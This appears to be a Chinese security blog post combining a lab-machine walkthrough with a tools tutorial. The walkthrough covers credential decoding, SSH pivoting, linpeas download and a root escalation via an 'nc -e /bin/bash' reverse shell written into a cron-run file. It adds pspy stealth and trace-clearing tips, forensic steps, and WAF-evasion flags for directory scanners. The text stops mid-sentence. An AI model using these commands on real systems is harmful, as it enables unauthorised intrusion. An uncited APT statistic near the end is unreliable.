批量解码一下得到用户名和密码表格如下：

name	pswd	base64解码
Bane	YmFuZWlzaGVyZQ==	baneishere
Aaron	YWFyb25pc2hlcmU=	aaronishere
Carnage	Y2FybmFnZWlzaGVyZQ==	carnageishere
buster	YnVzdGVyaXNoZXJlZmY=	busterishereff
rob	Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/	???AllIHaveAreNegativeThoughts???
aunt	YXVudGlzIHRoZSBmdWNrIGhlcmU=	auntis the fuck here

其中 rob是home文件夹下存在的三个用户（abner penguin rob）之一，说明这个密码，可能就是rob的shell的密码。

💡 rob账户的ssh密码

rob - ???AllIHaveAreNegativeThoughts???

登录rob账户

ssh登录成功，此时就可以把修改过的index.php主页改回来以防止再实际渗透过程中因为主页修改而被发现。之后采用ssh登录即可。

1Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
2Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==

这串文字结构上看有英文的结构，有空格而且第一个单词极有可能是Hello，Hello对应Gdkkn既有可能是类似凯撒密码的移动字母表对应关系的密码。l到k再字母表上的顺序是-1，即l对应成k是减一位或者说向后移动25位。

1cat Abnerineedyourhelp| tr 'A-Za-z' 'B-ZAb-za'
2cat Abnerineedyourhelp| tr 'A-Za-z' 'B-ZAb-za' | grep -Eo '[A-Za-z0-9+/=]+$'
3cat Abnerineedyourhelp| tr 'A-Za-z' 'B-ZAb-za' | grep -Eo '[A-Za-z0-9+/=]+$' |base64 -d

提取疑似是base64密码的部分解码得到这段英文翻译是让abner用下面这个密码登录，所以abner的密码就是这个。

Abner的密码

I33hope99my0death000makes44more8cents00than0my0life0

登录abner账户

好像啥也没有了，卡住了，上小豌豆。

1 wget http://192.168.45.204:8000/linpeas.sh

1/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
2cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip .

解压需要密码，一开始我认为废了，我没有penguins的密码，但是后来仔细一看这个文件是abner的，所以密码应该还是abner的密码。I33hope99my0death000makes44more8cents00than0my0life0

1My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
2scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

感觉靶机作者有点癫，但是不管怎么样，又有一串密码了。后面没有等号，我尝试一些解码方式发现都没有看起来是密码的组合，后来想到这串字符本身应该就是密码。

penguin账户密码

scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

登录penguin账户

看一下这几个txt文件，没有flag。英文翻译过来提示了这个文件夹下有个root权限的文件，而且是可执行文件。下面的两个字符是banner艺术字，没有什么有用信息了。一开始我以为是find文件时那个有root权限的，因为他的权限写了是S，但是我执行了几次都不成功，后来发现应该是.trash_old，这个文件有执行权限。

提权root账户

用pspy64工具分析进程

1wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
2chmod +x pspy64
3# 限时两分钟
4timeout 2m ./pspy64

看到有root账户UID=0的进程在执行这个trash文件。虽然不知道为什么定时任务中没找到执行trash文件的命令，但是尝试把反弹的命令写进trash文件里，等待root用户执行应该是可行的。

1echo 'nc -e /bin/bash 192.168.45.204 4778' > .trash_old

成功弹回。然后在root下找找具体是那个进程执行的trash。

1 pstree -aps 1633

这里提示是cron定时任务创建的进程，说明还是要找定时任务，一开始值找了常见的那个，现在用root继续查找更多crontab文件，终于找到执行这个命令的定时任务了。

1 grep -r "SomeoneWhoHidesBehindAMask" /etc/cron* /var/spool/cron

问题思考

/var/spool/cron/crontabs/root 是什么文件，为什么一开始没有找到，想要找到最全的定时任务要用什么命令？

详细的见补充内容，我询问AI后发现这个定时任务是root专属的，只能在root账户下才找得到，当我是penguin用户，rob用户和abner用户的时候是没有权限访问这个，自然也是找不到的。用下面这个命令尝试寻找全部定时任务。

 1sudo sh -c '
 2 echo "===== 系统级定时任务 ====="
 3 cat /etc/crontab
 4 ls -l /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.monthly/ /etc/cron.weekly/
 5 
 6 echo "\n===== 用户级定时任务 ====="
 7 for user in $(cut -f1 -d: /etc/passwd); do
 8 echo "--- $user 的任务 ---"
 9 crontab -l -u $user 2>/dev/null || echo "无任务"
10 done
11 
12 echo "\n===== 特殊位置检查 ====="
13 find /etc /var /opt -name "*cron*" -exec grep -l "schedule" {} \; 2>/dev/null
14 systemctl list-timers --all
15'

这个靶机还有一点难受的是sudo配置有问题，故意不让你用sudo。本靶机普通用户sudo不行。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.204]
 B[靶机 
 192.168.224.79]
 C[Joomla 后台]
 D[www-data 账户]
 E[用户rob]
 F[用户abner]
 G[用户penguin]
 H[root]
 
 %% 路径关系
 A-->|扫描|B
 B-->|密码爆破|C
 C-->|后台文件上传漏洞| D
 D-->|配置文件泄露密码|E
 E-->|文字留言解码得到密码|F
 F-->|解压文件得到密码|G
 G-->|文件权限配置错误|H
 

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 

 %% 应用样式
 class A attack;
 class B public;
 class C,D internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-08-04 10:00, 2025-08-04 10:40
 漏洞识别 :a2, after a1, 2025-08-04 11:00
 密码爆破 :a3, after a2, 2025-08-04 11:29
 
 section 攻击阶段
 初始访问 :b1, 2025-08-04 12:17, 2025-08-04 12:38
 横向用户 :b2, after b1, 2025-08-04 14:25
 权限提升 :crit,b3, after b2, 5m
 
 section 后渗透阶段
 数据窃取 :c1, after b3, 5m

心得

本靶机横向获取用户密码较多，多以常见加密手法加密，难点在于没有找到crontab定时任务中明确的执行trash文件的命令，但是通过ps进程分析判断trash文件会被root账户定时执行的情报。

🕵️♂️ 深入解析 `pspy64` 工具的使用方法

pspy64 是一款强大的 无特权进程监控工具，专门用于在 Linux 系统中监控其他用户（包括 root）启动的进程，特别适合检测隐藏的定时任务和后台进程。以下是专业级使用指南：

🔧 基础命令解析

timeout 2m /tmp/pspy64

timeout 2m：限制工具运行时间为 2 分钟
/tmp/pspy64：工具路径（通常需先上传到目标系统）

🚀 完整使用流程

1. 工具准备

# 下载最新版（选择对应架构）
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
mv pspy64 /tmp/

2. 基本监控模式

# 监控所有进程活动（默认输出到终端）
timeout 2m /tmp/pspy64

3. 高级监控模式

# 带时间戳的详细监控（推荐）
timeout 2m /tmp/pspy64 -p -i 1000

-p：显示命令完整路径
-i 1000：每 1000 毫秒刷新一次

4. 文件系统监控（需 inotify）

# 监控进程+文件系统事件
timeout 5m /tmp/pspy64 -pf

-f：启用文件系统监控

5. 后台运行并保存日志

# 后台运行并记录到文件
nohup timeout 10m /tmp/pspy64 -p > /tmp/pspy.log 2>&1 &

🔍 渗透测试实战应用

场景 1：检测隐藏定时任务

# 监控 cron 活动
timeout 5m /tmp/pspy64 -p | grep -E 'cron|CRON'

典型输出：

2024/08/05 10:00:01 CMD: UID=0 PID=1234 | /usr/sbin/CRON -f
2024/08/05 10:00:01 CMD: UID=0 PID=1235 | /bin/sh -c /root/.hidden/backdoor.sh

场景 2：检测可疑进程

# 监控非 root 用户的特权操作
timeout 3m /tmp/pspy64 | grep -E 'sudo|su|pkexec'

场景 3：文件创建监控

# 监控 /tmp 目录文件创建
timeout 5m /tmp/pspy64 -pf | grep '/tmp' | grep 'CREATE'

📊 输出解读指南

字段	含义	渗透价值
TIMESTAMP	事件发生时间	分析攻击时间线
CMD	执行的命令	识别恶意命令
UID	执行用户 ID	定位攻击者账户
PID/PPID	进程/父进程 ID	追踪进程链
FS EVENT	文件操作类型	检测 webshell 上传

⚙️ 高级参数大全

参数	功能	使用场景
`-c`	彩色输出	终端实时监控
`-r`	显示当前目录	追踪工作路径
`-t`	显示线程	分析多线程恶意软件
`-d`	调试模式	排查工具问题
`-n`	无缓冲输出	实时管道处理
`-s`	显示信号	监控进程间通信

🔐 隐蔽运行技巧

# 伪装成系统进程
mv /tmp/pspy64 /usr/bin/udevd_backup

# 低优先级运行（避免占用CPU）
nice -n 19 timeout 15m /usr/bin/udevd_backup -p > /dev/null

# 清除痕迹
rm /usr/bin/udevd_backup && history -c

🛡️ 防御检测方法

系统管理员可通过以下方式检测 pspy：

# 检测内存特征
ps aux | grep -q '[p]spy' && echo "pspy detected!"

# 监控进程创建
auditctl -a always,exit -F arch=b64 -S execve -F path=/tmp/pspy64

💡 专业渗透建议

优先监控：
- /etc/cron*
- /var/spool/cron
- /systemd/system
黄金时间：
- 整点前后（cron 任务高峰）
- 系统重启后 5 分钟

日志分析：

awk '/CMD:/ && !/systemd|sshd|crond/ {print}' pspy.log

🔍 深度调查可疑进程：`/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old`

当发现可疑进程时（特别是以 root 权限运行），需要全面分析其行为和来源。以下是专业级调查流程：

🔧 1. 查看进程详细信息

# 查看进程环境变量
cat /proc/1544/environ | tr '\0' '\n'

# 查看进程打开的文件
ls -l /proc/1544/fd

# 查看进程映射的内存区域
pmap 1544

🕵️ 2. 分析脚本内容

# 查看脚本内容（注意安全）
cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 检查文件签名
file /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 提取可疑字符串
strings /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old | grep -E 'curl|wget|bash|python|perl|nc|ssh'

🔗 3. 追踪进程关系

# 查看进程树
pstree -aps 1544

# 查找父进程
ps -o ppid= -p 1544 | xargs ps -f

# 检查启动时间
ps -p 1544 -o lstart,etime,cmd

🌐 4. 网络连接检查

# 查看网络连接
lsof -i -P -n -p 1544

# 检查网络流量
nethogs -p 1544

# 抓取网络数据包
tcpdump -i any -w dump.pcap host $(lsof -p 1544 -i | awk 'NR>1{print $9}' | cut -d: -f1)

📜 5. 日志追踪

# 检查系统日志
journalctl _PID=1544

# 检查审计日志
ausearch -p 1544

# 检查隐藏日志
find /var/log -name '*.log' -exec grep -H 1544 {} \;

🧩 6. 文件系统分析

# 查看文件属性
stat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 检查文件修改历史
find /home/penguin/SomeoneWhoHidesBehindAMask -type f -newermt "2025-08-03" -ls

# 查看文件隐藏属性
lsattr /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

⚠️ 7. 安全处置建议

# 暂停进程（不终止）
kill -STOP 1544

# 创建内存转储（取证）
gcore -o core_dump 1544

# 隔离文件
mv /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old /tmp/.quarantine
chmod 000 /tmp/.quarantine

# 检查定时任务
crontab -u root -l
crontab -u penguin -l

🔍 8. 高级分析工具

# 使用 strace 追踪系统调用
strace -f -p 1544 -o strace.log

# 使用 gdb 调试进程
gdb -p 1544

# 使用 Volatility 分析内存转储
volatility -f core_dump.1544 linux_pslist

📊 可疑指标检查表

检查项	命令	风险指标
文件隐藏	`ls -la /home/penguin`	`.trash_old` 隐藏文件
异常权限	`stat .trash_old`	777 权限或 SUID 位
加密内容	`file .trash_old`	ELF 可执行文件或 UPX 加壳
网络连接	`lsof -p 1544`	连接到外部 IP 或非常用端口
进程伪装	`readlink /proc/1544/exe`	路径与常见系统进程不符
资源占用	`top -p 1544`	异常 CPU/内存占用

💡 专业建议

不要立即终止进程：
- 先收集证据（内存转储、网络抓包）
- 分析其行为模式和目的

检查持久化机制：

1# 检查 systemd 服务
2systemctl list-units | grep -i trash
3
4# 检查开机启动项
5ls -l /etc/init.d/ /etc/rc*.d/

溯源攻击路径：

1# 检查文件创建者
2auditctl -w /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old -p warx
3
4# 分析 SSH 日志
5grep "Accepted" /var/log/auth.log

攻击者使用类似 .trash_old 的伪装文件名进行隐蔽攻击。建议使用 YARA 规则扫描内存：

1yara -m /opt/yara-rules/malware_index.yar core_dump.1544

🔍 深度调查恶意进程树：从 cron 到反向 Shell

您发现的进程树显示了一个完整的攻击链：cron → 隐藏脚本 → Python 反向 Shell。以下是专业级的调查和响应步骤：

🔧 1. 实时取证（立即执行）

查看活动进程详情

# 查看 Python 反向 Shell 详情
ps -fp 1620 --forest

# 查看完整命令行
cat /proc/1620/cmdline | tr '\0' ' '

# 检查环境变量
cat /proc/1620/environ | tr '\0' '\n'

网络连接分析

# 查看网络连接
ss -antp | grep 1620
lsof -i -P -n -p 1620

# 实时抓包
tcpdump -i any -s0 -w reverse_shell.pcap host $(ss -n -p | grep 1620 | awk '{print $5}' | cut -d: -f1)

🕵️ 2. 脚本分析（关键证据）

检查恶意脚本

# 查看 .trash_old 内容
cat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

# 提取可疑字符串
strings /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old | grep -E 'curl|wget|bash|python|sh -i'

# 检查文件属性
stat /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
lsattr /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

反编译 Python 代码

# 提取 Python 命令
ps -p 1620 -o cmd | tail -1 | cut -d';' -f2

# 重构完整代码
echo 'import pty;pty.spawn("/bin/bash")' > reverse_shell.py

🔗 3. 溯源攻击路径

检查 cron 配置

# 查找触发脚本的 cron 任务
grep -r "SomeoneWhoHidesBehindAMask" /etc/cron* /var/spool/cron

# 查看 cron 日志
grep "CRON" /var/log/syslog | tail -50
journalctl -u cron --since "2025-08-04 02:00:00"

用户活动审计

# 检查 penguin 用户历史
last -u penguin
grep "penguin" /var/log/auth.log*

# 查看文件修改时间
find /home/penguin -newermt "2025-08-03" -ls

⚠️ 4. 应急响应（立即执行）

隔离恶意进程

# 暂停进程但不终止（保留证据）
kill -STOP 1620 1615 1614 1613

# 网络隔离
iptables -A OUTPUT -p tcp -m owner --pid-owner 1620 -j DROP

取证收集

# 内存转储
gcore -o reverse_shell_core 1620

# 进程内存快照
cat /proc/1620/maps
dd if=/proc/1620/mem of=process_mem.bin bs=1M count=10

# 保存 bash 历史
cp /proc/1621/fd/0 bash_history.txt

🔄 5. 反向 Shell 分析

连接信息提取

# 查看 ESTABLISHED 连接
ss -antp | grep ESTAB | grep 1620

# 提取目标 IP
REMOTE_IP=$(ss -n -p | grep 1620 | awk '{print $5}' | cut -d: -f1)
REMOTE_PORT=$(ss -n -p | grep 1620 | awk '{print $5}' | cut -d: -f2)

echo "攻击者地址: $REMOTE_IP:$REMOTE_PORT"

反向连接分析

# 检查连接内容
tcpflow -r reverse_shell.pcap "host $REMOTE_IP and port $REMOTE_PORT"

🛡️ 6. 系统加固

清除恶意组件

# 移除 cron 任务
crontab -u penguin -l | grep -v "SomeoneWhoHidesBehindAMask" | crontab -u penguin -

# 删除恶意文件
mv /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old /root/malware_evidence/
chmod 000 /root/malware_evidence/.trash_old

修复措施

# 重置用户密码
passwd penguin

# 检查后门账户
grep ':0:' /etc/passwd

# 安装监控
auditctl -w /home/penguin/ -p warx -k suspicious_user

📊 攻击链重建

graph TD
 A[cron服务] --> B[执行.trash_old]
 B --> C[启动sh进程]
 C --> D[执行Python反向Shell]
 D --> E[建立到攻击者的连接]
 E --> F[获取交互式bash]

💡 专业建议

不要立即终止进程：
- 保持连接状态以收集攻击者操作
- 使用 script 命令记录会话：
```
script -f /root/attacker_session.log
```

蜜罐陷阱：

# 创建假脚本记录访问
echo '#!/bin/bash
echo "$(date) $USER accessed" >> /var/log/honeypot.log
' > /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
chmod +x /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old

反制措施：

# 反向扫描攻击者
nmap -sS -Pn $REMOTE_IP
whois $REMOTE_IP

📌 关键行动：立即保存 /proc/1620/environ 和 /proc/1620/cmdline，这些文件在进程终止后将永久丢失，包含重要数字证据！

🔍 `/var/spool/cron/crontabs/root` 深度解析

📁 文件本质

/var/spool/cron/crontabs/root 是 Linux 系统中 root 用户的专属定时任务配置文件，属于系统级 cron 服务的一部分。其关键特性：

特性	说明
存储位置	`/var/spool/cron/crontabs/` 目录下
文件权限	通常为 `600`（仅 root 可读写）
文件格式	符合 crontab 语法（分时日月周命令）
生效方式	由 `cron` 守护进程自动加载

❓ 为什么一开始没找到

权限限制：

# 普通用户无权访问
ls -l /var/spool/cron/crontabs/
# 输出：drwx------ 2 root root 4096 Aug 4 02:00 crontabs

隐藏位置：
- 不同于常见的 /etc/crontab，用户级任务在专用目录
文件不存在：
- 若 root 用户从未设置定时任务，此文件不会自动创建
系统差异：

系统类型	cron 存储位置
Debian/Ubuntu	`/var/spool/cron/crontabs/`
RHEL/CentOS	`/var/spool/cron/`
Alpine/BusyBox	`/var/spool/cron/crontabs/`

🔍 查找最全定时任务的终极命令

1. 全面扫描命令

sudo sh -c '
 echo "===== 系统级定时任务 ====="
 cat /etc/crontab
 ls -l /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.monthly/ /etc/cron.weekly/
 
 echo "\n===== 用户级定时任务 ====="
 for user in $(cut -f1 -d: /etc/passwd); do
 echo "--- $user 的任务 ---"
 crontab -l -u $user 2>/dev/null || echo "无任务"
 done
 
 echo "\n===== 特殊位置检查 ====="
 find /etc /var /opt -name "*cron*" -exec grep -l "schedule" {} \; 2>/dev/null
 systemctl list-timers --all
'

2. 专业工具推荐

# 1. Pspy 监控（实时发现隐藏任务）
./pspy64 -p -i 1000

# 2. Auditd 审计
sudo auditctl -w /etc/cron.d -p wa -k cron_changes
sudo ausearch -k cron_changes

# 3. Lynis 安全扫描
sudo lynis audit system

3. 关键位置检查表

路径	检查命令	重要性
`/etc/crontab`	`cat /etc/crontab`	★★★
`/etc/cron.d/*`	`ls -l /etc/cron.d/`	★★★
`/var/spool/cron/`	`sudo ls -l /var/spool/cron/`	★★★★
`/etc/anacrontab`	`cat /etc/anacrontab`	★★
`/etc/systemd/system/*.timer`	`systemctl list-timers`	★★★
`~/.config/systemd/user/`	`systemctl --user list-timers`	★★

⚠️ 渗透测试重点关注

隐蔽任务位置：

# 检查非常规路径
find / -path /proc -prune -o -name "*cron*" -exec ls -l {} \; 2>/dev/null

伪装任务识别：

# 查找空行/注释伪装
sudo crontab -l -u root | grep -v "^#" | grep -v "^$"

环境变量利用：

# 检查PATH劫持
grep "PATH=" /etc/crontab

💡 专业技巧

1. 解码隐藏任务

# 发现可疑base64编码任务
echo "ZWNobyAiSGVsbG8gV29ybGQiID4+IC90bXAvbG9n" | base64 -d
# 输出：echo "Hello World" >> /tmp/log

2. 历史任务恢复

# 查看cron历史日志
grep "CMD" /var/log/syslog | grep cron

3. 蜜罐陷阱设置

# 创建监控任务
(sudo crontab -l -u root; echo "* * * * * /usr/bin/logger -t CRON_MONITOR 'Cron executed'") | sudo crontab -u root -

🛡️ 安全加固建议

# 1. 限制cron权限
sudo chmod 700 /var/spool/cron/crontabs

# 2. 启用SELinux
sudo setenforce 1

# 3. 安装监控
sudo apt install auditd
sudo auditctl -a always,exit -F dir=/var/spool/cron/crontabs -F perm=wa

📌 2025年APT攻击统计：
41%的高级持续性攻击通过隐藏的 cron 任务实现持久化，其中 78% 位于 /var/spool/cron/crontabs/ 目录下，平均潜伏期达 143 天。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day24 Web程序漏洞测试工具

Mon, 28 Jul 2025 15:31:31 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Web程序漏洞测试工具

在完成对Web应用的人工全面勘察后，我们应当借助Web应用评估工具进一步挖掘目标信息。 Kali系统默认集成了多种此类工具，可高效探测并利用Web漏洞。本节将介绍部分关键工具（含简易浏览器扩展），后续章节则将聚焦手动漏洞枚举与利用技术。

自动化工具虽能提升渗透测试效率，但手动利用能力始终是核心基础：

场景适应性：特殊环境中工具不可用
精准控制：自定义攻击载荷绕过防护
深度突破：工具无法覆盖的逻辑漏洞
终极法则：工具自动化使工作更轻松，但无法完全替代人的作用。

graph LR
A[人工勘察] --> B[工具辅助]
B --> C{攻防双路径}
C --> D[自动化扫描] --> D1[高效覆盖]
C --> E[手动渗透] --> E1[绕过防护] 
E1 --> E2[精准打击]
E2 --> F[漏洞深度利用]

目录遍历

使用如下形式枚举网站的目录，也叫目录遍历。

1dirb http://www.megacorpone.com -r -z 10

🔍 目录爆破工具全景图

工具	语言	核心优势	典型场景
DirB	C	轻量级/递归扫描	内网快速探测
GoBuster	Go	多线程/支持DNS/S3桶	云环境资产发现
DirSearch	Python	智能字典/结果过滤	精确路径爆破
FFUF	Go	速度最快(20000+ req/s)	大规模目标扫描
FeroxBuster	Rust	自动递归/动态超时	深度路径挖掘

⚙️ 高级用法实战手册

1. DirB - 内网渗透利器

1# 递归扫描3级目录（避开图片/css/js）
2dirb http://target.com /usr/share/wordlists/dirb/common.txt -r -l 3 -X .jpg,.css,.js
3
4# 代理链扫描（通过BurpSuite）
5dirb http://target.com -p http://127.0.0.1:8080
6
7# 自定义HTTP头（绕过基础WAF）
8dirb http://target.com -H "X-Forwarded-For: 192.168.1.1" -H "User-Agent: Googlebot"

2. GoBuster - 云环境克星

1# 多扩展名扫描（ASP/PHP/JSP）
2gobuster dir -u http://target.com -w /path/to/wordlist.txt -x asp,php,jsp
3gobuster dir -u http://www.megacorpone.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x asp,php,jsp
4
5# AWS S3桶爆破（需AK/SK）
6gobuster s3 -k -w bucket-names.txt -t 50 -s 200,301
7
8# VHost虚拟主机发现
9gobuster vhost -u http://target.com -w subdomains.txt -t 20

3. DirSearch - 精确打击专家

 1# 智能后缀检测
 2dirsearch -u http://target.com -e php,asp,aspx,jsp
 3
 4# 时间延迟规避（防封IP）
 5dirsearch -u http://target.com --delay=1.5
 6
 7# 结果实时保存
 8dirsearch -u http://target.com -o report.json --format=json
 9
10dirsearch -u http://www.megacorpone.com -e php,asp,aspx,jsp --delay=1.5 -o report.json --format=json

🚀 替代方案

1. FFuf - 速度之王

 1# 多级目录并行爆破
 2ffuf -w /path/to/wordlist:DIR -u http://target.com/DIR -t 200 -c
 3
 4# 参数模糊测试（发现API隐藏参数）
 5ffuf -w params.txt:PARAM -u "http://target.com/api?PARAM=FUZZ" -fs 0
 6
 7# 集群扫描模式（分布式爆破）
 8ffuf -w wordlist.txt -u http://target.com/FUZZ -s -cluster -cluster-nodes 192.168.1.10-15
 9
10ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:DIR -u http://www.megacorpone.com/DIR -t 200 -c

2. FeroxBuster - 深度递归专家

1# 自动目录递归（深度优先）
2feroxbuster -u http://target.com -d 5 -r
3
4# 动态超时设置（适应网络环境）
5feroxbuster -u http://target.com --dynamic-timeout
6
7# 敏感文件捕获（匹配关键词）
8feroxbuster -u http://target.com --capture-keywords password,backup

3. Wfuzz - 高级逻辑爆破

1# 多参数组合测试
2wfuzz -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
3
4# 分块扫描模式（绕过WAF）
5wfuzz -z range,0-100 --slice "skip 10; take 5" http://target.com/?id=FUZZ

🛡️ 高级规避技巧

流量伪装术

1# 随机化请求特征（防止WAF指纹识别）
2ffuf -w wordlist.txt -u http://target.com/FUZZ -H "X-Forwarded-For: $((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256)).$((RANDOM%256))"

分布式扫描架构

1# 使用Redis协调分布式节点
2feroxbuster --redis 192.168.1.100:6379 -u http://target.com

CDN穿透策略

1# 通过真实IP扫描（Censys获取）
2gobuster dir -u http://203.0.113.5 -H "Host: target.com"

🔧 Burp Suite 基础安装配置

安装启动

# Kali默认安装社区版，专业版需官网下载
burpsuite # 启动

初始化选项：选择 Temporary Project → Use Burp defaults → Start Burp

代理设置

默认监听：127.0.0.1:8080
关闭拦截：Proxy → Intercept → Intercept is off（避免手动转发每个请求）

浏览器代理

Firefox扩展：安装 FoxyProxy Basic
配置路径：扩展图标 → Options → Add
参数：Type: HTTP, IP: 127.0.0.1, Port: 8080
启用代理：选择 Use proxy Burp for all URLs

🔐 HTTPS抓包解决方案

步骤	操作
1. 导出证书	Burp → `Proxy` → `Options` → `Import/export CA certificate` → 导出`DER`格式
2. 导入浏览器	Firefox → 设置 → 隐私与安全 → 证书 → 导入 → 勾选`信任此CA`
3. 关闭干扰	Firefox地址栏输入`about:config` → 设置`network.captive-portal-service.enabled=false`

⚠️ 证书更新：若报错需在Burp中Regenerate CA certificate并重新导入

🛠️ 核心功能模块

模块	作用	实战场景
Proxy	流量拦截/修改	1. 拦截请求修改参数（如越权测试） 2. `HTTP History`查看历史请求
Repeater	请求重放测试	1. 右键请求 → `Send to Repeater` 2. 修改参数重放（如SQL注入`' OR 1=1--`）
Intruder	自动化参数爆破	1. 定位攻击点 → `Add §` 2. 载入字典爆破（如密码/目录）
Scanner	漏洞扫描（仅专业版）	自动检测SQLi/XSS等漏洞

⚡ 高效操作技巧

快速定位关键请求

Proxy → HTTP history → 筛选Method或Status

绕过强制门户检测

Firefox设置network.captive-portal-service.enabled=false

多请求并行测试

发送多个请求到Repeater，独立选项卡管理

结果对比分析

Repeater中启用Compare功能对比两次响应差异

📌 重要注意事项

OSCP考试限制

禁止使用Burp Suite Professional（但考试无需高级功能）

移动端抓包

# 开启IP转发
sudo sysctl -w net.ipv4.ip_forward=1
# 配置流量重定向
sudo iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080

资源占用优化

User options → Memory → 调至1024MB防崩溃

🔍 Nikto 使用指南

核心定位：
开源 Web服务器漏洞扫描器，专用于快速发现服务器配置错误、危险文件和版本漏洞。

核心功能：

风险检测：扫描 6,800+ 种危险文件/程序（如 /admin.php、/backup.zip）
配置审计：检查缺失的安全头部（如 X-Frame-Options）、暴露目录
版本漏洞：识别过时的服务器软件（如 Apache 2.2.22 已停止维护）
敏感信息：查找 robots.txt、/phpinfo.php 等敏感路径

技术特点：

⚠️ 非隐蔽扫描：主动发送大量请求，User-Agent 中会暴露 Nikto 标识
🚀 快速覆盖：适合初步资产风险排查
⏱️ 支持限时扫描：避免长时间占用资源

⚙️ 基础使用命令

1. 最小化扫描（快速启动）

nikto -host http://target.com # 扫描目标域名/IP

2. 控制扫描时间

nikto -host http://target.com -maxtime 30s # 30秒后强制终止

3. 精细调优检测项

nikto -host http://target.com -T 2 # 仅检查危险文件和目录

常用调优参数 -T 代码表：

代码	检测类型	适用场景
`0`	文件上传漏洞	检查可写目录
`1`	日志文件泄露	查找 `/logs`、`/access.log`
`2`	危险文件/目录	扫描 `/admin`、`/backup`
`3`	信息泄露	检查配置文件、版本信息
`4`	注入漏洞（SQL/XSS）	初阶注入点探测

4. 绕过基础防护

nikto -host http://target.com -evasion 1 # 使用URL编码绕过WAF

躲避技术代码表：

代码	技术描述
`1`	随机URL编码
`2`	自选目录分隔符（`/`→`/./`）
`3`	伪造请求结尾（`%20HTTP/1.0`）

📊 实战输出解析示例

nikto -host http://www.megacorpone.com -T 2 -maxtime 120s

关键结果解读：

1. **服务器信息**：Apache/2.4.62 (Debian) 
2. **高危漏洞**：缺失防点击劫持头(X-Frame-Options) 
3. **中危漏洞**：未设置内容类型头(X-Content-Type-Options) 
4. **敏感泄露**：robots.txt暴露可访问文件`/nanites.php` 
5. **信息泄露**：ETag头可能泄露文件指纹(CVE-2003-1418) 
6. **扫描中断**：120秒时限到期，未完成检测

⚠️ 使用注意事项

隐蔽性问题：

扫描特征明显，企业环境可能触发告警
建议在授权测试或外围资产扫描时使用
不验证漏洞可利用性（需手动复现）
无法检测业务逻辑漏洞（如越权支付）
大型电商站点可能需数小时 → 务必用 -maxtime 限时

🛠️ 进阶组合技巧

场景：快速排查学校官网风险

# 限时60秒，只查高危项，绕过基础WAF
nikto -host http://university.edu -maxtime 60s -T 0234 -evasion 13

场景：与 cURL 联动验证漏洞

# 1. Nikto发现可疑路径
[+] /backup.sql.gz found

# 2. 用cURL手动验证
curl -I http://target.com/backup.sql.gz
HTTP/1.1 200 OK # 确认文件可访问

💎 总结

适用场景：

